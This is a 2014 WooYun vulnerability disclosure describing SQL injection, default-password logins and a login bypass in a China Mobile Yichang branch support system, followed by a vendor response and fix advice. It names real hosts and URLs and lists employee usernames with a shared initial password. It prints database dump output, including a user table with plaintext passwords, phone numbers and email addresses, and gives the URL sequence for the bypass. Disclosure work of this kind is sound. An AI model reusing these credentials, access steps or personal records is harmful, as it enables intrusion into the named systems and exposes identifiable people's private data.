当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075134

漏洞标题:中国移动宜昌市分公司某系统存在SQL注入(登陆绕过)

相关厂商:中国移动

漏洞作者: cf_hb

提交时间:2014-09-05 13:52

修复时间:2014-10-20 13:54

公开时间:2014-10-20 13:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-05: 细节已通知厂商并且等待厂商处理中
2014-09-10: 厂商已经确认,细节仅向厂商公开
2014-09-20: 细节向核心白帽子及相关领域专家公开
2014-09-30: 细节向普通白帽子公开
2014-10-10: 细节向实习白帽子公开
2014-10-20: 细节向公众公开

简要描述:

湖北省宜昌市移动分公司某系统存在SQL注入漏洞漏洞、用户初始化密码登陆导致内部信息泄露,一个低权限用户登陆绕过漏洞。

详细说明:

相关厂商:湖北省宜昌市移动分公司
漏洞对象:宜昌市移动业务支撑平台
一些URL及图:
http://218.200.124.71:9090/login.asp

login.PNG


http://218.200.124.71:81/
没登陆前:

nologin.PNG


网上找到一些员工电话,利用提示的初始化密码登陆后:

index2.PNG


比如:
用户名:lifei_yc 密码:1q2w3e4r
用户名:13607208515 密码:1q2w3e4r
用户名:13607207003 密码:1q2w3e4r
用户名:chenshi_yc 密码:1q2w3e4r
等等。。。。。

user.PNG


通过uid遍历查看其他用户名,应该99%的人都是用的初始化密码。然后可以登录他们的账号!
挨个挨个翻用户,翻用户的数据,论坛里面发的文档等内部资料,能找到管理组的用户等进去 及可以进行更多的操作了。
业务支撑的首页:
http://111.47.65.11:9090/
这里面的测试到的所有用户提交的参数都没有进行过滤,存在SQL注入高风险:
下面利用的是一处登陆表单的注入:
注入点:http://218.200.124.70/login.aspx
注入结果:
得到32个数据库
available databases [32]:
[*] BILLITEM
[*] BOSS15
[*] BOSSDICT
[*] BOSSRESULT
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QDDBA
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] WORKFLW
[*] WXFJ
[*] XDB
[*] YTX
当前使用的WORKFLW库的所有表:
Database: WXFJ
[90 tables]
+--------------------------------+
| GHB |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| WXYYSLB |
| YJGLXXB |
| YTX_HUAWEI_CHECK |
| YTX_HUAWEI_CHECK_1 |
| YTX_HUAWEI_CHECK_201008 |
| YTX_HUAWEI_CHECK_201009 |
| YTX_HUAWEI_CHECK_201010 |
| YTX_HUAWEI_CHECK_201011 |
| YTX_HUAWEI_CHECK_201012 |
| YTX_HUAWEI_CHECK_201101 |
| YTX_HUAWEI_CHECK_201102 |
| YTX_HUAWEI_CHECK_201103 |
| YTX_HUAWEI_CHECK_201104 |
| YTX_HUAWEI_CHECK_201105 |
| YTX_HUAWEI_CHECK_201106 |
| YTX_HUAWEI_CHECK_201107 |
| YTX_HUAWEI_CHECK_201108 |
| YTX_HUAWEI_CHECK_201109 |
| YTX_HUAWEI_CHECK_201110 |
| YTX_HUAWEI_CHECK_201111 |
| YTX_HUAWEI_CHECK_201112 |
| YTX_HUAWEI_CHECK_201201 |
| YTX_HUAWEI_CHECK_201202 |
| YTX_HUAWEI_CHECK_201203 |
| YTX_HUAWEI_CHECK_201204 |
| YTX_HUAWEI_CHECK_201205 |
| YTX_HUAWEI_CHECK_201206 |
| YTX_HUAWEI_CHECK_201207 |
| YTX_HUAWEI_CHECK_201208 |
| YTX_HUAWEI_CHECK_STRUCT |
| YTX_HUAWEI_MOBTICKET |
| YTX_HUAWEI_MOBTICKET_2012 |
| YTX_HUAWEI_MOBTICKET_STRUCT |
| YTX_HUAWEI_MOB_201001 |
| YTX_HUAWEI_MOB_201002 |
| YTX_HUAWEI_MOB_201003 |
| YTX_HUAWEI_MOB_201004 |
| YTX_HUAWEI_MOB_201005 |
| YTX_HUAWEI_MOB_201006 |
| YTX_HUAWEI_MOB_201007 |
| YTX_HUAWEI_MOB_201008 |
| YTX_HUAWEI_MOB_201009 |
| YTX_HUAWEI_MOB_201010 |
| YTX_HUAWEI_MOB_201011 |
| YTX_HUAWEI_MOB_201012 |
| YTX_HUAWEI_MOB_201101 |
| YTX_HUAWEI_MOB_201102 |
| YTX_HUAWEI_MOB_201103 |
| YTX_HUAWEI_MOB_201104 |
| YTX_HUAWEI_MOB_201105 |
| YTX_HUAWEI_MOB_201106 |
| YTX_HUAWEI_MOB_201107 |
| YTX_HUAWEI_MOB_201108 |
| YTX_HUAWEI_MOB_201109 |
| YTX_HUAWEI_MOB_201110 |
| YTX_HUAWEI_MOB_STRUCT |
| YTX_NEWSETTLE_ALL_PBXIP |
| YTX_NEWSETTLE_ALL_PBXIP_NOT |
| YTX_NEWSETTLE_ALL_PBXIP_TEL |
| YTX_NEWSETTLE_ALL_PBXIP_TEL_T |
| YTX_NEWSETTLE_COMPANY |
| YTX_NEWSETTLE_COMPANY_TYPE |
| YTX_NEWSETTLE_GTHM |
| YTX_NEWSETTLE_ITEM_RECORD |
| YTX_NEWSETTLE_ITEM_RECORD_UP |
| YTX_NEWSETTLE_ITEM_TYPE |
| YTX_NEWSETTLE_ITEM_UNION |
| YTX_NEWSETTLE_MOBTICKET |
| YTX_NEWSETTLE_MOBTICKET_STRUCT |
| YTX_NEWSETTLE_PAY_RECORD |
| YTX_NEWSETTLE_PAY_RECORD_UP |
| YTX_NEWSETTLE_RULE |
| YTX_NEWSETTLE_SPACE |
| YTX_NEWSETTLE_SPACE_TYPE |
| YTX_NEWSYSTEM_PERSON |
| YTX_NEWSYSTEM_PURVIEW |
| YTX_NEWSYSTEM_PURVIEWROLES |
| YTX_NEWSYSTEM_STATE |
| YTX_NEWTOHUAWEI |
| YTX_NEWTOHUAWEI_STRUCT |
| YTX_TMP |
| YTX_TMP1 |
| YWDMB1 |
| YYDB |
+--------------------------------+
数据库用户及密码hash:

漏洞证明:

PS:(编辑器找不到传图片的地方了,)

0ZXA1M_48%[T1W_7}D$}}63.jpg


接着上面的写:
数据库Hash:

hash.PNG


当前数据库的部分表:
当前数据库WORKFLW:
[02:43:44] [INFO] retrieved: YMR_TEMP1
Database: WORKFLW
[272 tables]
+----------------------------+
| "APP_????" |
| "APP_????_IN" |
| "APP_????_IN_TMP" |
| "APP_????_TMP" |
| "APP_????" |
| ADI_MBUSER_GPRS |
| APP_2GHIGHT_MOVE_TARGET |
| APP_AUDIT |
| APP_AUDIT_DATA |
| APP_AUDIT_DATA_INPUT |
| APP_AUDIT_DATA_INPUT2 |
| APP_BOSS_NET_COMMAND |
| APP_BOSS_WORKGROUP |
| APP_BPM_ALARM |
| APP_BPM_YWZC_CX |
| APP_CJ_QUEST |
| APP_CJ_XYW_MX |
| APP_CJ_XYW_MX_201404 |
| APP_CJ_XYW_MX_201404_BAK |
| APP_CJ_XYW_MX_201405 |
| APP_CJ_XYW_MX_201406 |
| APP_CJ_XYW_MX_201407 |
| APP_CJ_XYW_MX_BAK |
| APP_CJ_XYW_MX_temp |
| APP_CJ_XYW_RESULT |
| APP_CJ_XYW_RESULT_BAK |
| APP_CRM_REQUEST_MAM |
| APP_CROSS_SWITCH |
| APP_CWB_ZYSGFPKJSQ |
| APP_DBGL_INFO_V4 |
| APP_DICT_GROUP |
| APP_DICT_ITEM |
| APP_GROUPSPECIAL_BPMI_TASK |
| APP_GROUPSPECIAL_TASK_VIEW |
| APP_GROUP_SPECIAL_LINE |
| APP_GROUP_SPECIAL_LINE_G1 |
| APP_GROUP_SPECIAL_LINE_G2 |
| APP_ICT_DETAILED |
| APP_IM_INV_MOBTEL |
| APP_IM_INV_MOBTEL_IN |
| APP_IM_PUB_MOBTEL |
| APP_IM_PUB_MOBTEL_IN |
| APP_IM_PUB_MOBTEL_TMP |
| APP_JFJ_BAND |
| APP_KF_TS |
| APP_LAC_CI_OLD_NEW |
| APP_LUCKNUM_APPLY |
| APP_LUCKY_NUMBER |
| APP_MSG_VIEW_HISTORY |
| APP_NZPSQ |
| APP_ROAM_CROSS_DOWN |
| APP_ROAM_LAC_CI_DOWN |
| APP_ROAM_LOCAL |
| APP_SCB_KDXF |
| APP_SCB_KDXZ |
| APP_SCB_KDXZ_NEW |
| APP_SCB_TTKD_ONU |
| APP_SCB_XGSLZD |
| APP_SCB_XGSTZD |
| APP_SCB_ZDQCDJ |
| APP_SCB_ZDRKDJ |
| APP_SOCRE_SALE |
| APP_SYSTEM_BPM |
| APP_SYSTEM_BPM_DEVELOG |
| APP_SYSTEM_BPM_DEVEORDER |
| APP_SYSTEM_BPM_POST |
| APP_SYSTEM_BPM_SCHEDULE |
| APP_SYSTEM_BPM_SCORE |
| APP_SYSTEM_OP_TYPE |
| APP_SYSTEM_SQLLOG |
| APP_TASK |
| APP_TASK_DETAILED |
| APP_YCSCB_ZDRK |
| APP_YCZDZYCK |
| APP_YCZYCK |
| APP_YC_BSC_INFO |
| APP_YC_CWBFPSL |
| APP_YC_CWB_SWDKFP |
| APP_YC_EXCHANGEBOARD_INFO |
| APP_YC_FPRKDJ |
| APP_YC_IMEI_TERMINAL_INFO |
| APP_YC_OFFICIAL |
| APP_YC_RNC_INFO |
| APP_YC_SCYXZYCK |
| APP_YC_SCZYGL |
| APP_YC_SCZYSQ |
| APP_YC_SCZYZYGLCK |
| APP_YC_STATION_INFO |
| APP_YC_XGSNBSL |
| APP_YC_XGSZYDB |
| APP_YC_ZDRKDJ |
| APP_YC_ZXLC |
| APP_ZH_DBGL_SCORE |
| APP_ZH_DBGL_TASK |
| APP_ZQKHB_CWTZDSQ |
| APP_ZYT_DHJLWHXT |
| APP_ZYT_DZJDJ |
| APP_ZYT_JTJZYX |
| APP_ZYT_JXHSP |
| APP_ZYT_PLTF |
| APP_ZYT_TXSJSB |
| APP_ZYT_TZXYD |
| BPMA_ACCESS |
| BPMA_GETPASSWORD |
| BPMB_BOSS_WORKGROUP |
| BPMB_TASK |
| BPMB_TASK_DETAILED |
| BPMD_APP_JM_SET |
| BPMD_APP_TABLE |
| BPMD_APP_TABLE_COLS |
| BPMD_APP_TABLE_INDEX |
| BPMD_BPM_ALARM |
| BPMD_BPM_ALARM_20140301 |
| BPMD_CATALOG |
| BPMD_CONDSYMBOL |
| BPMD_DASHBOARD |
| BPMD_DATADICT |
| BPMD_DATASOURCE |
| BPMD_EVENT |
| BPMD_EVENT_20131012 |
| BPMD_EVENT_LOG |
| BPMD_FILEGROUP |
| BPMD_FORM |
| BPMD_FORMDATAMAP |
| BPMD_JOINDATARULE |
| BPMD_JOINDATARULE_20131012 |
| BPMD_MODEL |
| BPMD_MODELNODE |
| BPMD_MODELTRANSITION |
| BPMD_MULTIAPPROVE |
| BPMD_MULTIRECIPIENT |
| BPMD_NODE |
| BPMD_NODE_20131012 |
| BPMD_PARTICIPANT |
| BPMD_PARTICIPANT_20131012 |
| BPMD_PARTICIPANT_20131113 |
| BPMD_PERF |
| BPMD_PROCESS |
| BPMD_REPORT |
| BPMD_SCHEDULERECU |
| BPMD_SYSINFO |
| BPMD_SYSVARIABLE |
| BPMD_SYSVARIABLE_20131012 |
| BPMD_TASKSCHEDULE |
| BPMD_TRANSITION |
| BPMD_TRANSITION_20131012 |
| BPMD_UIMENU |
| BPMD_UIMENU_ACTION |
| BPMI_AGENTLIST |
| BPMI_AGENTLOG |
| BPMI_EVENT |
| BPMI_EXELOG |
| BPMI_FILE |
| BPMI_FILEDETAIL |
| BPMI_FILEGROUP |
| BPMI_FILEMEMBER |
| BPMI_FILE_BAK |
| BPMI_FORMCONTENT |
| BPMI_FORMCONTENT_20130715 |
| BPMI_FORMCONTENT_BAK |
| BPMI_FORMNO |
| BPMI_FORMNOCACHE |
| BPMI_GETPASSWORD |
| BPMI_LOG |
| BPMI_MESSAGE |
| BPMI_MULTIAPPROVE |
| BPMI_NOTIFY |
| BPMI_NOTIFY_FINISH |
| BPMI_PERF |
| BPMI_PORTAL |
| BPMI_PORTALREAD |
| BPMI_PORTAL_FINISH |
| BPMI_RECEDE |
| BPMI_ROLEMENUACCESS |
| BPMI_ROLEPROCACCESS |
| BPMI_SERVERLOG |
| BPMI_SMS |
| BPMI_SMS_CONTENT |
| BPMI_SYSVARIABLE |
| BPMI_TASK |
| BPMI_TASKINITDEPT |
| BPMI_TASK_20120726_DEL |
| BPMI_TASK_20130715 |
| BPMI_TASK_20131012 |
| BPMI_TASK_BAK |
| BPMI_TOKEN |
| BPMI_TOKENLAST |
| BPMI_TOKENLAST_20130715 |
| BPMI_TOKENLAST_BAK |
| BPMI_TOKENPATH |
| BPMI_TOKENPATH_20130715 |
| BPMI_TOKENPATH_20140311 |
| BPMI_TOKENPATH_BAK |
| BPMI_TOKENSHARE |
| BPMI_TOKENSHARE_20130715 |
| BPMI_TOKEN_20130715 |
| BPMI_TOKEN_20140311 |
| BPMI_TOKEN_BAK |
| BPMI_TOKEN_MEMO |
| BPMI_UIMENU |
| BPMI_WAITSCHEDULE |
| BPMI_WORKSCHEDULE |
| BPMP_ANNUALSUMMARY |
| BPMP_ANNUALTOP |
| BPMP_CALENDAR |
| BPMP_EVENT |
| BPMP_MONITOR |
| BPMP_TIMESHIFT |
| BPMU_AGENTDETAIL |
| BPMU_AGENTINFO |
| BPMU_FIELDITEM |
| BPMU_FIELDVALUE |
| BPMU_GROUP |
| BPMU_GROUP_BAK |
太多了列举展示了一部分。。。。
部分数据:
Table: BPMU_USER
[5 entries]
+----------+----------------------------------+-----------+-------------+----------+------------------------------+-------------+--------+--------+-------------+---------+---------+---------+----------+----------+----------+----------------------------------+-----------+------------------------------+-----------+------------+------------+------------+------------+-------------+------------+--------------+
| HRID | DEPTID | CATALOGID | TEL | PWD | EMAIL | MBTEL | REMARK | UORDER | ACCOUNT | DSPNAME | OA_NAME | ISLEAVE | DEPTNAME | JOBTITLE | ISENABLE | DEPTCODE | JOINDATE | OA_EMAIL | LEAVEDATE | SUPERVISOR | LDAPDOMAIN | COSTCENTER | BRANCHNAME | OA_ACCOUNT | BRANCHCODE | LOCATIONCODE |
+----------+----------------------------------+-----------+-------------+----------+------------------------------+-------------+--------+--------+-------------+---------+---------+---------+----------+----------+----------+----------------------------------+-----------+------------------------------+-----------+------------+------------+------------+------------+-------------+------------+--------------+
| 0 | NULL | NULL | 13277250994 | PC8AR8VS | 13277250994@139.com | 13277250994 | NULL | 0 | 13277250994 | ?? | ?? | 0 | ????? | NULL | 1 | 71f174d965f1452797b3457781944070 | 10-10?-11 | 13277250994@139.com | 01-1? -01 | NULL | NULL | NULL | NULL | 13277250994 | NULL | NULL |
| 0 | 45e04179af3a4d39b9306ce72a3f53d6 | NULL | 13469810006 | PC8AR8VS | 13469810006@139.com | 13469810006 | NULL | 0 | 13469810006 | ??? | ??? | 0 | ????? | NULL | 1 | 45e04179af3a4d39b9306ce72a3f53d6 | 10-10?-11 | 13469810006@139.com | 01-1? -01 | NULL | NULL | NULL | NULL | 13469810006 | NULL | NULL |
| 0 | NULL | NULL | 13469811777 | abc123 | 13469811777@139.com | 13469811777 | NULL | 379 | 13469811777 | ??? | NULL | 0 | NULL | NULL | 1 | NULL | 04-8? -14 | NULL | 04-8? -14 | NULL | NULL | NULL | NULL | NULL | NULL | NULL |
| 0 | 1c8d8ad7424940ba934480725a5b0db1 | NULL | 13469811607 | PC8AR8VS | 13469811607@139.com | 13469811607 | NULL | 0 | 13469811607 | ??? | ??? | 0 | ?????? | NULL | 1 | 1c8d8ad7424940ba934480725a5b0db1 | 10-10?-11 | 13469811607@139.com | 01-1? -01 | NULL | NULL | NULL | NULL | 13469811607 | NULL | NULL |
| 35027160 | NULL | NULL | 13469813068 | wingzero | zhangxin3@hb.chinamobile.com | 13469813068 | NULL | 0 | 13469813068 | ??3 | ??3 | 0 | ?????? | ???????? | 1 | 7b33d787d2fc4c04bcdd30bc78f52fec | 10-10?-11 | zhangxin3@hb.chinamobile.com | 30-12?-99 | NULL | NULL | NULL | NULL | zhangxin3 | NULL | NULL |
+----------+----------------------------------+-----------+-------------+----------+------------------------------+-------------+--------+--------+-------------+---------+---------+---------+----------+----------+----------+----------------------------------+-----------+------------------------------+-----------+------------+------------+------------+------------+-------------+------------+--------------+
业务支撑后台登陆绕过:

rao-1.PNG


访问这个URL,打开用[户4G情况查询]
http://218.200.124.71:9090/report/DirReport.asp?reportname=OS.Publice.List4G

rao-2.PNG


只需要访问一下这个页面,然后修改URL直接访问根目录,就直接跳进后台去了。

backIndex.PNG


rao-3.PNG


修复方案:

1. 严格过滤用户提交的数据
2. 严格控制用户权限,限制未授权的访问和操作。
3. 论坛那个初始化密码别显示出来告诉游客了!

版权声明:转载请注明来源 cf_hb@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2014-09-10 08:59

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT通报给中国移动集团公司,由其后续协调网站管理单位处置。按多个漏洞评分,rank 16

最新状态:

暂无


漏洞评价:

评论

  1. 2014-09-10 09:17 | cf_hb ( 普通白帽子 | Rank:119 漏洞数:17 | 爱生活,爱安全!)

    fuck...